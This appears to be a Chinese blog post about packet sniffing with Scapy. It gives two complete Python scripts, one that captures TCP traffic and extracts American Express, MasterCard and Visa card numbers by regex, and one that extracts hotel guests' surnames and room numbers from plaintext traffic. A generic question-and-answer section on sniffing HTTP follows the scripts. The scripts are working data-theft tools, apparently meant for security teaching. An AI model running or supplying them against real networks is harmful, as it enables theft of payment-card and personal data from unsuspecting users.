Scapy嗅探TCP数据包

#!/usr/bin/python
#coding=utf-8
import re
import optparse
from scapy.all import *

def findCreditCard(pkt):
	raw = pkt.sprintf('%Raw.load%')
	# American Express信用卡由34或37开头的15位数字组成
	americaRE = re.findall('3[47][0-9]{13}', raw)
	# MasterCard信用卡的开头为51~55,共16位数字
	masterRE = re.findall('5[1-5][0-9]{14}', raw)
	# Visa信用卡开头数字为4,长度为13或16位
	visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)

	if americaRE:
		print '[+] Found American Express Card: ' + americaRE[0]
	if masterRE:
		print '[+] Found MasterCard Card: ' + masterRE[0]
	if visaRE:
		print '[+] Found Visa Card: ' + visaRE[0]

def main():
	parser = optparse.OptionParser('[*]Usage: python creditSniff.py -i <interface>')
	parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
	(options, args) = parser.parse_args()

	if options.interface == None:
		print parser.usage
		exit(0)
	else:
		conf.iface = options.interface

	try:
		print '[*] Starting Credit Card Sniffer.'
		sniff(filter='tcp', prn=findCreditCard, store=0)
	except KeyboardInterrupt:
		exit(0)

if __name__ == '__main__':
	main()





#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

def findGuest(pkt):
    #sprintf("%Raw.load%")函数实现提取tcp数据段,并将其转化为字符串
    '''
     tcp数据段,并将其转化为字符串,但是转化后的结果类似于raw_string,字符串中的‘\x’失效了,被当做了2个字符。请问该怎么转化,使得转义字符‘\x’生效,使得类似‘\x11’、'\x04'等等的字符被看做一个字符而不是4个?
     解答:用个函数实现rawstring转string,即可。
     raw = raw.replace('\'','')
     string = raw.decode('string_escape')
    '''
    raw = pkt.sprintf('%Raw.load%')
    #语法:findall(pattern, string, flags=0) 正则表达式 re findall 方法能够以列表的形式返回能匹配的子串
    # . 匹配任意一个字符,换行符除外
    # * 匹配前一个正则表达式的0次或多次重复
    # ? 匹配前一个正则表达式的0次或1次重复
    name = re.findall('(?i)LAST_NAME=(.*)&', raw)
    room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
    if name:
        print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])

def main():
    parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Hotel Guest Sniffer.'
        sniff(filter='tcp', prn=findGuest, store=0)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()



  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: 使用Scapy嗅探HTTP流量的方法如下: 1. 安装Scapy:在终端或命令行中输入 "pip install scapy" 即可安装。 2. 启动Scapy:在终端或命令行中输入 "scapy" 并回车,进入Scapy交互界面。 3. 定义过滤规则:使用Scapy的 sniff() 函数来嗅探网络流量,并通过filter参数指定嗅探的过滤规则,如 "sniff(filter="tcp port 80")" 表示只嗅探端口为80的TCP流量。 4. 解析HTTP流量:在Sniff函数中,可以通过 prn 参数指定回调函数,在回调函数中判断每个报文是否为HTTP流量,并对其进行解析。 以上是大致的嗅探HTTP流量的步骤,如需详细示例代码,可以参考Scapy官方文档。 ### 回答2: 使用Scapy进行HTTP流量嗅探可以通过以下步骤完成: 1. 导入必要的库和模块:导入Scapy库以及HTTP模块。 2. 创建嗅探器:使用Scapy的sniff()函数创建一个嗅探器,设置嗅探器过滤条件为HTTP流量。 3. 捕获HTTP请求和响应:在嗅探器的回调函数中,使用匹配条件过滤出HTTP请求和响应数据包。 4. 解析HTTP数据包:从每个HTTP请求和响应数据包中提取所需的信息,如请求方法、URL、头部字段、实体内容等。 5. 分析和处理数据:根据需要进行数据的分析和处理,可以将解析的数据保存到文件、数据库或进行进一步的操作。 以下是一个示例代码: ```python from scapy.all import * from scapy.layers.http import HTTPRequest, HTTPResponse def packet_callback(packet): if packet.haslayer(HTTPRequest): http_request = packet[HTTPRequest] print(f"HTTPRequest: {http_request.Method.decode()} {http_request.Path.decode()}") if packet.haslayer(HTTPResponse): http_response = packet[HTTPResponse] print(f"HTTPResponse: {http_response.Status_Code.decode()} {http_response.Reason_Phrase.decode()}") sniff(filter="tcp port 80", prn=packet_callback, store=0) ``` 上述代码使用了Scapy的sniff()函数创建了一个嗅探器,设置过滤条件为端口为80的TCP流量。在回调函数中,使用haslayer()函数检测数据包中是否包含HTTP请求或响应,并通过调用相应的字段解析函数提取所需信息。 运行该代码后,你将能够捕获并输出所有通过端口80的HTTP请求和响应的相关信息。你也可以根据自己的需要对数据进行进一步处理。 ### 回答3: 使用Scapy嗅探HTTP流量有以下几个步骤: 1. 导入必要的模块和类: 首先,需要导入必要的模块和类来使用Scapy库。例如,可以导入`scapy.all`模块并创建一个Sniffer对象。 2. 设置过滤器: 设置过滤器可以筛选出需要嗅探的HTTP流量。可以使用BPF过滤器语法来定义需要过滤的流量。例如,`"tcp port 80"`表示过滤HTTP流量。 3. 开始嗅探: 创建Sniffer对象,并设置参数,如网络接口和过滤器。然后,执行sniff()方法开始嗅探流量。 4. 解析流量: Scapy通过回调函数来处理嗅探到的流量数据包。可以自定义回调函数来解析HTTP流量,并对其进行相应的操作。通常,解析HTTP流量的时候,需要判断数据包中的协议类型与端口号是否为HTTP。如果是HTTP流量,可以使用`TCP`和`Raw`类来获取HTTP请求和响应的详细信息。 5. 分析和处理流量: 当解析出HTTP请求和响应的详细信息后,可以对其进行进一步的分析和处理。可以提取出相关字段,如请求的URL、请求方法、响应码等,以及相应的报文体。根据需要,可以将这些信息输出到控制台、保存到文件或进行其他操作。 需要注意的是,Scapy嗅探流量时需要有足够的权限。在Linux中,可以使用root权限执行脚本;在Windows中,可以使用管理员权限运行脚本。 以上是使用Scapy嗅探HTTP流量的基本步骤,根据具体需求还可以进行更多的操作和处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值